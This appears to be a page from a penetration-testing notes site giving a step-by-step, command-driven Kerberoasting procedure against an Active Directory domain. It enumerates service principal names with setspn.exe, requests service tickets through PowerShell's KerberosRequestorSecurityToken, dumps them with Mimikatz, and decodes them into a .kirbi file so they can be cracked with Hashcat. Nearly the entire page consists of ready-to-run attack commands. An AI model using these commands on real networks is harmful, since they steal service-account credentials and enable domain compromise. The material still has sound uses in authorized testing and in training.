Semi-Manual Way

Usually we would be doing kerberoasting with tools, but sometimes we don't have access to them, so this is more minimalistic approach.

Enumerating SPNs with setspn.exe

C:\> setspn.exe -Q */*

Targeting a single user

PS C:\> Add-Type -AssemblyName System.IdentityModel

PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/NC.riotech.local:1433"

Retrieve all tickets with setspn.exe

PS C:\> setspn.exe -T RIOTECH.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

With this two commands we are:

Load necessary .NET classes (Add-Type).
Create an object for Kerberos authentication (New-Object).
The object requests a TGS ticket for the given service.
The ticket is stored in memory under that object.

Extract Tickets with Mimikatz

mimikatz # base64 /out:true

mimikatz # kerberos::list /export  

// If we do not use base64 out true command, mimikatz will put tickets in .kirbi file.

Base64 Blob Processing

echo "<base64 blob>" | tr -d \\n | base64 -d > sqldev.kirbi

Then go to Hashcat section in main Kerberoasting section and crack it.

PreviousKerberoasting NextTargeted Kerberoasting

Last updated 5 months ago

hashtagEnumerating SPNs with setspn.exe

hashtagTargeting a single user

hashtagRetrieve all tickets with setspn.exe

hashtagExtract Tickets with Mimikatz

hashtagBase64 Blob Processing

Enumerating SPNs with setspn.exe

Targeting a single user

Retrieve all tickets with setspn.exe

Extract Tickets with Mimikatz

Base64 Blob Processing